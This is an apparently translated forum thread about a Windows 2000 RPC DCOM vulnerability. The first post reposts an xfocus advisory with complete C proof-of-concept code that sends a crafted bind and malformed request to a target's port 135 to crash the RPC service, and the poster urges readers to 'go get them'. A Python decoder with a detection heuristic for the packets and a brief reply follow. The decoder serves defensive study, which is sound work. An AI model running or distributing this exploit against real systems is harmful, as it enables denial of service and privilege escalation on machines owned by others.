
Win2k (escalate privileges)



NeoGenessis
28-07-2003, 10:26
I found an interesting page that warns of a major Windows 2000 vulnerability which can allow full control of the machine. The news, in English, is:

Microsoft Windows 2000 RPC DCOM Interface DOS AND Privilege Escalation Vulnerability

Create: 2003-07-25
Author: flashsky (flashsky1_at_sina.com)

1. Description:
There is a vulnerability in the part of RPC that deals with message exchange over TCP/IP. The failure results from incorrect handling of malformed messages.
By sending malformed messages to the DCOM __RemoteGetClassObject interface, the RPC service will crash, and all services and applications depending on the RPC service will behave abnormally.
If the attacker has an account, he can hijack the epmapper pipe and port 135 for privilege escalation after the RPC service crashes.

2. Affected Systems:
Windows 2000 + SP3
Windows 2000 + SP4+

3. Proof of concept code:


#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

/* DCE/RPC bind PDU (ptype 0x0B) for the DCOM activation interface */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

/* DCE/RPC request PDU (ptype 0x00) carrying the malformed stub data */
unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

int main(int argc,char ** argv)
{
    WSADATA WSAData;
    int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;

    short port=135;               /* RPC endpoint mapper */
    unsigned char buf1[0x1000];
    printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
    printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n");
    printf("Welcome to http://www.xfocus.net\n");
    if(argc<2)
    {
        printf("useage:%s target\n",argv[0]);
        exit(1);
    }

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return 1;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return 1;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d\n",WSAGetLastError());
        return 1;
    }
    /* send the bind and peek at the bind_ack */
    if (send(sock,(char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return 1;
    }

    i=recv(sock,(char *)buf1,1024,MSG_PEEK);
    /* send the malformed request and peek at whatever comes back */
    if (send(sock,(char *)request,sizeof(request),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:%d\n",WSAGetLastError());
        return 1;
    }
    i=recv(sock,(char *)buf1,1024,MSG_PEEK);
    closesocket(sock);
    WSACleanup();
    return 0;
}
5. About XFOCUS.ORG
Xfocus is a non-profit and free technology organization which was founded in 1998 in China. We are devoted to research on and demonstration of weaknesses related to network services and communication security.
We hope that we can use new technical tools to achieve our goal and to broaden our outlook. We also hope we can communicate and help each other through this amazing Internet.
This site was created for publishing some documents, code and utilities from our research work. Any suggestions are welcome; please contact us at webmaster_at_xfocus.org.
From the Internet. For the Internet. Have fun!


Don't be too naughty. And go get them, there are only a few of them!!!
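As an added example (not part of the post, nor code from xfocus), here is a decoder for the two DCE/RPC PDUs the PoC sends, with the bytes copied from the arrays above. It reads the connection-oriented header and the bind/request bodies, resolves the interface UUID in the bind, and checks a single-fragment request whose alloc_hint claims more stub data than the fragment carries, which is the kind of field-level inconsistency a detection rule for this traffic can key on. The interface name in the comment comes from MS-DCOM; the check is this example's own heuristic, not something the advisory states.

```python
import struct
import uuid

# The two PDUs from the PoC above, copied here as test input.
BIND_PDU = bytes.fromhex(
    "05000b0310000000480000007f000000" "d016d016000000000100000001000100"
    "a001000000000000c000000000000046" "00000000045d888aeb1cc9119fe80800"
    "2b10486002000000")
REQUEST_PDU = bytes.fromhex(
    "05000003100000004800000013000000" "90000000010003000500060100000000"
    + "31" * 32 + "0000000000000000")

PTYPE = {0: "request", 2: "response", 3: "fault", 11: "bind", 12: "bind_ack"}
PFC_FIRST_FRAG, PFC_LAST_FRAG = 0x01, 0x02

def parse_pdu(data):
    """Decode the 16-byte connection-oriented DCE/RPC header and the bind or
    request body after it. Both PDUs announce little-endian data (drep 0x10)."""
    if len(data) < 16:
        raise ValueError("short PDU")
    vers, vers_minor, ptype, flags = data[0], data[1], data[2], data[3]
    frag_len, auth_len, call_id = struct.unpack_from("<HHI", data, 8)
    pdu = {"version": (vers, vers_minor), "ptype": PTYPE.get(ptype, ptype),
           "flags": flags, "frag_length": frag_len, "call_id": call_id,
           "length_ok": frag_len == len(data)}
    if ptype == 11:  # bind: frag sizes, assoc group, then the context list
        pdu["max_xmit_frag"], pdu["max_recv_frag"] = struct.unpack_from("<HH", data, 16)
        # first presentation context element: id at 28, abstract syntax at 32
        pdu["context_id"] = struct.unpack_from("<H", data, 28)[0]
        # 000001a0-0000-0000-c000-000000000046 is IRemoteSCMActivator (MS-DCOM)
        pdu["interface"] = str(uuid.UUID(bytes_le=data[32:48]))
        pdu["transfer_syntax"] = str(uuid.UUID(bytes_le=data[52:68]))
    elif ptype == 0:  # request: alloc_hint, context id, opnum, then stub data
        alloc_hint, ctx_id, opnum = struct.unpack_from("<IHH", data, 16)
        pdu.update(alloc_hint=alloc_hint, context_id=ctx_id, opnum=opnum,
                   stub_length=frag_len - 24 - auth_len)
    return pdu

def single_fragment_hint_mismatch(pdu):
    """True for a request flagged as both first and last fragment whose
    alloc_hint promises more stub data than the fragment actually carries."""
    if pdu["ptype"] != "request":
        return False
    mask = PFC_FIRST_FRAG | PFC_LAST_FRAG
    return (pdu["flags"] & mask) == mask and pdu["alloc_hint"] > pdu["stub_length"]

if __name__ == "__main__":
    for raw in (BIND_PDU, REQUEST_PDU):
        decoded = parse_pdu(raw)
        print(decoded, "mismatch:", single_fragment_hint_mismatch(decoded))
```

The request decodes to opnum 3 on context 1 with 48 bytes of stub data behind an alloc_hint of 144, while the bind names the activation interface and NDR transfer syntax.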

Dragonety
04-08-2003, 19:30
I haven't studied the code, but it seems that what it does is access one of the services on the TCP or UDP ports with sockets; on the other hand, it seems to be meant to run directly on the local machine.
The comments could at least have been in the language of Cervantes.